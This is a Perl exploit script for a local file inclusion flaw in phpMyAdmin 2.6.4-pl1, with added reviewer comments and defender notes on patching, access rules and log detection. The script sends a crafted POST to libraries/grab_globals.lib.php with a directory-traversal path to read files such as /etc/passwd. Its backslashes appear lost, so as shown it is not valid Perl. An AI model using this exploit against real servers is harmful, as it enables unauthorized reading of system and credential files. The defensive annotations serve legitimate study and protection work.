#!/usr/bin/perl
use IO::Socket;
# SecurityReason.com TEAM
# Maksymilian Arciemowicz ( cXIb8O3 ) cxib@securtiyreason.com
#
# Local file inclusion (./$FILE)
# simple exploit phpMyAdmin 2.6.4-pl1
#
#
# SecurityReason.com
#
# ---------------------------------------------------------------------------
# Review summary
#
# Purpose: proof-of-concept for the local file inclusion named in the header
# above. It sends one unauthenticated HTTP/1.0 POST to
# <DIR>libraries/grab_globals.lib.php on TCP port 80 and prints the response.
# The POST body carries the user-supplied path in subform[1][redirect];
# presumably the target script includes that path relative to "./", as the
# header and the warning text matched below suggest.
#
# NOTE(review): the backslashes in this listing appear to have been lost in
# extraction ("rn"/"n" inside the strings, unescaped "/" and "()" in the two
# regexes), so it is not valid Perl as shown. The code is kept as published.
# NOTE(review): no "use strict" / "use warnings"; all variables are package
# globals.
#
# Defender notes:
#   * Affected release as stated by the author: phpMyAdmin 2.6.4-pl1. Move to a
#     maintained phpMyAdmin release.
#   * Files under libraries/ are include files; deny direct HTTP access to
#     that directory in the web-server configuration.
#   * Detection: access-log entries for POST requests straight to
#     libraries/grab_globals.lib.php; request bodies with a
#     subform[N][redirect] value containing "../"; PHP error-log warnings of
#     the form "main(): Unable to access ./...".
#   * Hardening: PHP's open_basedir limits which files an include can reach.
# ---------------------------------------------------------------------------

# Usage banner: printed when fewer than three arguments (HOST, DIR, FILE) are given.
if (@ARGV < 3)
{
    print "rn SecurityReason TEAMrn";
    print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1rn";
    print " rn";
    print "perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILErnrn";
    print "HOST - Host where is phpmyadmin example: http://localhostrn";
    print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/rn";
    print "FILE - file to inclusion ../../../../../etc/passwdrnrn";
    print "example cmd: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/ ../../../../../etc/passwdrnrn";
    exit();
}

# HOST is used both as the connect address and as the Host: header value.
$HOST = $ARGV[0];
# Request path: the phpMyAdmin base directory plus the library file being targeted.
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
# Despite the name, $FILE holds the whole form-encoded POST body; the
# user-supplied path (ARGV[2]) is concatenated into it without URL-encoding.
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$ARGV[2]."&subform[1][cXIb8O3]=1";
# Byte count for the Content-Length header.
$LENGTH = length $FILE;

print "rnATTACK HOST IS: ".$HOST."rnrn";
# Intended to strip a leading "http://" so that only the host name remains
# (the pattern is garbled in this listing, see the note at the top).
$HOST =~ s/(http://)//;

# Plain TCP connection to port 80 (hard-coded; no TLS, no alternate port).
# NOTE(review): the "Error 404" text is misleading. This branch is reached when
# the socket cannot be created, not when the server answers with HTTP 404.
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404rnrn";

# Hand-written HTTP/1.0 POST: request line, Host, Content-Type,
# Content-Length, then the body built above.
print $get1 "POST ".$DIR." HTTP/1.0n";
print $get1 "Host: ".$HOST."n";
print $get1 "Content-Type: application/x-www-form-urlencodedn";
print $get1 "Content-Length: ".$LENGTH."nn";
print $get1 $FILE;

# Read the response line by line and echo it to the terminal.
while ($odp = <$get1>)
{
    # A PHP warning naming ./<FILE> is taken to mean that the requested file
    # does not exist (or cannot be read); report that and stop.
    if ($odp =~ /Warning: main(): Unable to access ./$ARGV[2] in / ) {
        printf "nnFile ".$ARGV[2]." no exists.rnrn";
        exit;
    }
    # NOTE(review): printf uses the server's response line as the format
    # string, so any "%" in it is interpreted as a conversion; print would
    # echo the line verbatim.
    printf $odp;
}